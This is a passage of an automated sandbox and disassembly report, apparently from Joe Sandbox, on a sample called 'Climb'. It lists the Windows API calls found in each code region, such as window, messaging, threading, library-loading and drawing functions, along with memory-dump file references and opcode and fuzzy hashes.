                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 005832A6
                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005832C0
                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005832CE
                                                                                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 005832DC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Long$AttributesLayered
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2169480361-0
                                                                                                                                                                      • Opcode ID: a268fd8ecf442a4f268126ef24fa8e6e0ea2d827272636debac59a319eeebc5b
                                                                                                                                                                      • Instruction ID: d64cdd28dfd73ce54cb2c5510d80bf4aebb50a5c01326f5b51c68e5cc566204a
                                                                                                                                                                      • Opcode Fuzzy Hash: a268fd8ecf442a4f268126ef24fa8e6e0ea2d827272636debac59a319eeebc5b
                                                                                                                                                                      • Instruction Fuzzy Hash: 0821E035204115AFD704AB24C845F6ABBA5FF81724F248258FC26AB2D2C775ED46CBD0
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 005596E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00558271,?,000000FF,?,005590BB,00000000,?,0000001C,?,?), ref: 005596F3
                                                                                                                                                                        • Part of subcall function 005596E4: lstrcpyW.KERNEL32(00000000,?,?,00558271,?,000000FF,?,005590BB,00000000,?,0000001C,?,?,00000000), ref: 00559719
                                                                                                                                                                        • Part of subcall function 005596E4: lstrcmpiW.KERNEL32(00000000,?,00558271,?,000000FF,?,005590BB,00000000,?,0000001C,?,?), ref: 0055974A
                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,005590BB,00000000,?,0000001C,?,?,00000000), ref: 0055828A
                                                                                                                                                                      • lstrcpyW.KERNEL32(00000000,?,?,005590BB,00000000,?,0000001C,?,?,00000000), ref: 005582B0
                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,005590BB,00000000,?,0000001C,?,?,00000000), ref: 005582EB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                      • String ID: cdecl
                                                                                                                                                                      • API String ID: 4031866154-3896280584
                                                                                                                                                                      • Opcode ID: a6c75111d3375765443a3055342c351d3c3a7165743237ed984c35f56728e58b
                                                                                                                                                                      • Instruction ID: a30bf542d3947837ec1b10fd96ba5c38c7b5f37ac6c394bfbb4453e2ad6f1a1b
                                                                                                                                                                      • Opcode Fuzzy Hash: a6c75111d3375765443a3055342c351d3c3a7165743237ed984c35f56728e58b
                                                                                                                                                                      • Instruction Fuzzy Hash: D211E13A200242ABDB14AF38CC59E7A7BE9FF88751B10502BFD02D7290EF319845D7A0
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 0058615A
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0058616C
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00586177
                                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 005862B5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend_wcslen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 455545452-0
                                                                                                                                                                      • Opcode ID: c0f0f29be4f45517414ffe489250a06953c19ab6763d842882ef6e9fce35bcf6
                                                                                                                                                                      • Instruction ID: fbb3b1df69721d2c819fb84f00eaa683a660aa748812aac15502e51e34d848dc
                                                                                                                                                                      • Opcode Fuzzy Hash: c0f0f29be4f45517414ffe489250a06953c19ab6763d842882ef6e9fce35bcf6
                                                                                                                                                                      • Instruction Fuzzy Hash: 06117F75600219AAEB10AF648C89AEE7FBCFB51354F10452AFE11F6082EB70C944DBA0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c79f492b195c12832e14774a78770151d4f343bc06a8cdc4cc5fe6246d932fe2
                                                                                                                                                                      • Instruction ID: 9fa60fe153b4d9eef7f17aa9d572f19df4ad0427deb4f59b95662973e05e33ef
                                                                                                                                                                      • Opcode Fuzzy Hash: c79f492b195c12832e14774a78770151d4f343bc06a8cdc4cc5fe6246d932fe2
                                                                                                                                                                      • Instruction Fuzzy Hash: 5E018FB62096267EF72126787CC8F276B5DFF933B8F300725B521A11D1DE608C409560
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00552394
                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005523A6
                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005523BC
                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005523D7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                      • Opcode ID: fcf7ba979a1d75596964eb755b21397816320850b72d7e2c0e328bfca3aad3b0
                                                                                                                                                                      • Instruction ID: 001659d0fa75904662d105a5658dab1dc422cd8b4de534dc2f1dd4afa8ccecd7
                                                                                                                                                                      • Opcode Fuzzy Hash: fcf7ba979a1d75596964eb755b21397816320850b72d7e2c0e328bfca3aad3b0
                                                                                                                                                                      • Instruction Fuzzy Hash: F211093A900219FFEF119BA5CD85F9DBBB8FB09750F210492EA01B7290D6716E14DB94
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0055EB14
                                                                                                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 0055EB47
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0055EB5D
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0055EB64
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2880819207-0
                                                                                                                                                                      • Opcode ID: 1ad3666de4a6854809f7eb7fcb64661de55f3cbd5d9a603ede50259f448e36a0
                                                                                                                                                                      • Instruction ID: b9f1cb6689dd87f2668949741d3cfb62636c36a16db5ddf9950bfe90922fe6f4
                                                                                                                                                                      • Opcode Fuzzy Hash: 1ad3666de4a6854809f7eb7fcb64661de55f3cbd5d9a603ede50259f448e36a0
                                                                                                                                                                      • Instruction Fuzzy Hash: 07110876900258BFC705ABA89C0AE9A7FBDBB55322F104656FC15E32D0D6748A0C97B0
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,?,0051D369,00000000,00000004,00000000), ref: 0051D588
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0051D594
                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0051D59B
                                                                                                                                                                      • ResumeThread.KERNEL32(00000000), ref: 0051D5B9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 173952441-0
                                                                                                                                                                      • Opcode ID: 02665435a5c523ef1e0909bf4d71a35defe4ca157c07fa2d2781f1888da1d0c0
                                                                                                                                                                      • Instruction ID: 5783c7ac229a6bd725fe56615aa05fdb6a7a510aff122796acfe8acbc88962f4
                                                                                                                                                                      • Opcode Fuzzy Hash: 02665435a5c523ef1e0909bf4d71a35defe4ca157c07fa2d2781f1888da1d0c0
                                                                                                                                                                      • Instruction Fuzzy Hash: CC01C4324041157BEB106BA5EC09AEA7F7AFF81335F110219F925961E0DBB19984D7B1
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004F78B1
                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 004F78C5
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 004F78CF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3970641297-0
                                                                                                                                                                      • Opcode ID: 67e57670c7a9cf096369a9269258627e13636a1573398517bcc4eb8ba564035a
                                                                                                                                                                      • Instruction ID: 17bb4a4c879fbba019539f87284481c4fc05a03f0e9a2f17ec0f9d9dadfc3f83
                                                                                                                                                                      • Opcode Fuzzy Hash: 67e57670c7a9cf096369a9269258627e13636a1573398517bcc4eb8ba564035a
                                                                                                                                                                      • Instruction Fuzzy Hash: BE118B7250554DBFEF026F909C58EFA7BA9FF183A4F041116FE01A2160D7399C60EBA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,0052338D,00000364,00000000,00000000,00000000,?,005235FE,00000006,FlsSetValue), ref: 00523418
                                                                                                                                                                      • GetLastError.KERNEL32(?,0052338D,00000364,00000000,00000000,00000000,?,005235FE,00000006,FlsSetValue,00593260,FlsSetValue,00000000,00000364,?,005231B9), ref: 00523424
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0052338D,00000364,00000000,00000000,00000000,?,005235FE,00000006,FlsSetValue,00593260,FlsSetValue,00000000), ref: 00523432
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                      • Opcode ID: 0d24ac4ff2f6fa056af645ba9899c712583781a611cd96bc65a7a67c1fc03f27
                                                                                                                                                                      • Instruction ID: db6408b4b61bf43097ee3b084577d562272854c00874e77dedd72f14c25db1c6
                                                                                                                                                                      • Opcode Fuzzy Hash: 0d24ac4ff2f6fa056af645ba9899c712583781a611cd96bc65a7a67c1fc03f27
                                                                                                                                                                      • Instruction Fuzzy Hash: DE01B536611232ABCF225A79AC48D563FA8BF26B61B210660F906E31C0D724DA05C6E0
                                                                                                                                                                      APIs
                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0055B69A,?,00008000), ref: 0055BA8B
                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0055B69A,?,00008000), ref: 0055BAB0
                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0055B69A,?,00008000), ref: 0055BABA
                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0055B69A,?,00008000), ref: 0055BAED
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2875609808-0
                                                                                                                                                                      • Opcode ID: 442fdf7317fe72ef32eee6737e37477c7409ab80bdb90d8038b5397e2a31380c
                                                                                                                                                                      • Instruction ID: b4d6ef3a8c35576710b5cdb4b3c3ea0670ae454552c4ec43fcc6a5c21c2669dc
                                                                                                                                                                      • Opcode Fuzzy Hash: 442fdf7317fe72ef32eee6737e37477c7409ab80bdb90d8038b5397e2a31380c
                                                                                                                                                                      • Instruction Fuzzy Hash: 38117971C00629E7EF00EFA4E95D6EEBFB8BF09712F100486DD41B2280CB309658DBA1
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0058888E
                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 005888A6
                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 005888CA
                                                                                                                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 005888E5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 357397906-0
                                                                                                                                                                      • Opcode ID: 8171b295916f9e5036b8ce96b68a3281f084eabe666b8bed2295edffb45d41ac
                                                                                                                                                                      • Instruction ID: c1dcf8c6acd93be66f8894cdaba1a99e935fa6602653ace7d4927ad40f15fd2a
                                                                                                                                                                      • Opcode Fuzzy Hash: 8171b295916f9e5036b8ce96b68a3281f084eabe666b8bed2295edffb45d41ac
                                                                                                                                                                      • Instruction Fuzzy Hash: 051160B9D0020DAFDB41DFA9C884AEEBBF5FB18310F508166E915E2250E735AA54DF60
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00553712
                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00553723
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0055372A
                                                                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00553731
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2710830443-0
                                                                                                                                                                      • Opcode ID: 9ecc0ce379c53b3687d2ea37125902eb0c7a4cf302596360e9353c154f362068
                                                                                                                                                                      • Instruction ID: 5a2bf302834b955a903764bc54a8eaf51ca8d884a9d5c7119b979be4341439f2
                                                                                                                                                                      • Opcode Fuzzy Hash: 9ecc0ce379c53b3687d2ea37125902eb0c7a4cf302596360e9353c154f362068
                                                                                                                                                                      • Instruction Fuzzy Hash: 21E065B151122476D72017A29C4DEEB7FBCEF56BE1F000015F909E10C0DBA18648D2B0
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 004F1F87
                                                                                                                                                                        • Part of subcall function 004F1F2D: SelectObject.GDI32(?,00000000), ref: 004F1F96
                                                                                                                                                                        • Part of subcall function 004F1F2D: BeginPath.GDI32(?), ref: 004F1FAD
                                                                                                                                                                        • Part of subcall function 004F1F2D: SelectObject.GDI32(?,00000000), ref: 004F1FD6
                                                                                                                                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 005892E3
                                                                                                                                                                      • LineTo.GDI32(?,?,?), ref: 005892F0
                                                                                                                                                                      • EndPath.GDI32(?), ref: 00589300
                                                                                                                                                                      • StrokePath.GDI32(?), ref: 0058930E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1539411459-0
                                                                                                                                                                      • Opcode ID: fb865ad2324b98a73113d9aac02f36a1b0d42d0bef0323ce544deef7afd0a22c
                                                                                                                                                                      • Instruction ID: c3c7d55c74ec1e32bf2652a323360f96b28c53ca23afdbdfed012b293c22e6d0
                                                                                                                                                                      • Opcode Fuzzy Hash: fb865ad2324b98a73113d9aac02f36a1b0d42d0bef0323ce544deef7afd0a22c
                                                                                                                                                                      • Instruction Fuzzy Hash: 3FF03A31005658BADB126F54AC0EFDA3FAAAF1A320F048000FE15350E1C7755565ABE9
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSysColor.USER32(00000008), ref: 004F21BC
                                                                                                                                                                      • SetTextColor.GDI32(?,?), ref: 004F21C6
                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004F21D9
                                                                                                                                                                      • GetStockObject.GDI32(00000005), ref: 004F21E1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Color$ModeObjectStockText
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4037423528-0
                                                                                                                                                                      • Opcode ID: 339ebbf8a92ac77c6207fdce41527c439539cedaaff0bd9ad112f135a86f151f
                                                                                                                                                                      • Instruction ID: f970e9c31c998ada1687f64f9f9fc44f1ae1b3049e9f8475efee2e33bc21385b
